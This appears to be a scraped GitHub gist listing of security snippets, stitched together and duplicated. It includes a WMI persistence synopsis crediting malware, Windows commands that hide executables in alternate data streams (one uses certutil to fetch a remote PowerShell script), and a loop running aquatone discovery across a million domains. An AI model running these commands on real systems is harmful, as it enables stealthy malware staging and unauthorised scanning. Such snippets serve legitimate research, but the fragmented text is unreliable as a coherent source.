Alexander Knorr opexxx

## WMIPersistence.vbs
'
' SYNOPSIS:
' 	WMI Persistence method as originally presented by SEADADDY malware
'		(https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' 	and further documented by Matt Graeber.
'
' 	The scheduled command will be launched after roughly 3 minutes since system
' 	gets up. Also, even if the command shall spawn a window - it will not be visible,
' 	since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'

## Exe_ADS_Methods.txt
###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat

## iranian_apit_groups_possible_commands.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                opexxx
                / iranian_apit_groups_possible_commands.md
            
            
              Created
              January 9, 2020 23:31
                — forked from MSAdministrator/iranian_apit_groups_possible_commands.md
            
              
                Iranian APT Groups & Possible Commands Used By These Groups
              
          
    Overview

The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:

APT33
APT34
APT39
Charming Kitten


## gh-backup-starred.sh
#!/bin/bash

user="CHANGEME"
pages=$(curl -I https://api.github.com/users/$user/starred | sed -nr 's/^Link:.*page=([0-9]+).*/\1/p')

for page in $(seq 0 $pages); do
    curl "https://api.github.com/users/$user/starred?page=$page&per_page=100" | jq -r '.[].html_url' |
    while read rp; do
      git clone $rp
    done

## roycewilliams-github-starred.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                opexxx
                / roycewilliams-github-starred.md
            
            
              Created
              October 28, 2019 09:42
                — forked from roycewilliams/roycewilliams-github-starred.md
            
              
                roycewilliams-github-starred.md
              
          
    roycewilliams / tychotithonus GitHub starred

Last updated: 2019-08-27


https://github.com/003random/003Recon
https://github.com/0x27/ssh_keyscanner
https://github.com/0x4a0x72/pwnedless
https://github.com/0x4D31/fatt
https://github.com/0x4D31/honeyLambda
https://github.com/0x90/miranda-upnp
https://github.com/0xbadjuju/Tokenvator
https://github.com/0xbsec/duprule


## ToolBox.sh
#!/bin/bash

echo " ______   ______     ______     __         ______     ______     __  __     ______     __  __
      /\__  _\ /\  __ \   /\  __ \   /\ \       /\  == \   /\  __ \   /\_\_\_\   /\  ___\   /\ \_\ \
       \/_/\ \/ \ \ \/\ \  \ \ \/\ \  \ \ \____  \ \  __<   \ \ \/\ \  \/_/\_\/_  \ \___  \  \ \  __ \
          \ \_\  \ \_____\  \ \_____\  \ \_____\  \ \_____\  \ \_____\   /\_\/\_\  \/\_____\  \ \_\ \_\
           \/_/   \/_____/   \/_____/   \/_____/   \/_____/   \/_____/   \/_/\/_/   \/_____/   \/_/\/_/ "


echo ""

## aquatonescane_alexa.sh
#!/bin/bash
wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip top-1m.csv.zip
for l in `cat top-1m.csv | cut -d',' -f2`
do
   aquatone-discover -d $l --threads 90
done

## socio-political-word-list.txt
4chan
activis*
allah
alpha
alt-right*
anarchis*
anita sarkeesian
arian
aryan
Auschwitz

## README.md

      
              2 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                opexxx
                / README.md
            
            
              Created
              May 29, 2019 10:37
                — forked from paralax/README.md
            
              
                Using Terraform and Docker, demoed with CyberChef
              
          
    Using Terraform and Docker on OSX

Recently I had to learn myself some Terraform for real, and it hit me - Docker (which I have come to use extensively) would be a perfect environment in which to do this.
Before you begin, make sure you have Terraform installed:
$ brew install terraform

Start the Docker TCP listener


## AWS Solutions Architect Associate
----- Interested Reads------
+ Interesting Read (Serverless Architecture of Acloud guru)
  https://read.acloud.guru/serverless-the-future-of-software-architecture-d4473ffed864

----- Getting Started-------
+ Requirements
  + AWS Free Tier Account
  + PC with putty and putty keygen/ Mac
  + Optional
    + IoS/ Android App $20
	'
	' SYNOPSIS:
	' WMI Persistence method as originally presented by SEADADDY malware
	' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
	' and further documented by Matt Graeber.
	'
	' The scheduled command will be launched after roughly 3 minutes since system
	' gets up. Also, even if the command shall spawn a window - it will not be visible,
	' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
	'
	###Add content to ADS###
	type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
	extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
	findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
	certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
	makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
	print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
	reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
	regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
	expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
	#!/bin/bash

	user="CHANGEME"
	pages=$(curl -I https://api.github.com/users/$user/starred \| sed -nr 's/^Link:.page=([0-9]+)./\1/p')

	for page in $(seq 0 $pages); do
	curl "https://api.github.com/users/$user/starred?page=$page&per_page=100" \| jq -r '.[].html_url' \|
	while read rp; do
	git clone $rp
	done
	#!/bin/bash

	echo " ______ ______ ______ __ ______ ______ __ __ ______ __ __
	/\__ _\ /\ __ \ /\ __ \ /\ \ /\ == \ /\ __ \ /\_\_\_\ /\ ___\ /\ \_\ \
	\/_/\ \/ \ \ \/\ \ \ \ \/\ \ \ \ \____ \ \ __< \ \ \/\ \ \/_/\_\/_ \ \___ \ \ \ __ \
	\ \_\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ \ \_____\ /\_\/\_\ \/\_____\ \ \_\ \_\
	\/_/ \/_____/ \/_____/ \/_____/ \/_____/ \/_____/ \/_/\/_/ \/_____/ \/_/\/_/ "


	echo ""
	#!/bin/bash
	wget http://s3.amazonaws.com/alexa-static/top-1m.csv.zip
	unzip top-1m.csv.zip
	for l in `cat top-1m.csv \| cut -d',' -f2`
	do
	aquatone-discover -d $l --threads 90
	done
	4chan
	activis*
	allah
	alpha
	alt-right*
	anarchis*
	anita sarkeesian
	arian
	aryan
	Auschwitz
	----- Interested Reads------
	+ Interesting Read (Serverless Architecture of Acloud guru)
	https://read.acloud.guru/serverless-the-future-of-software-architecture-d4473ffed864

	----- Getting Started-------
	+ Requirements
	+ AWS Free Tier Account
	+ PC with putty and putty keygen/ Mac
	+ Optional
	+ IoS/ Android App $20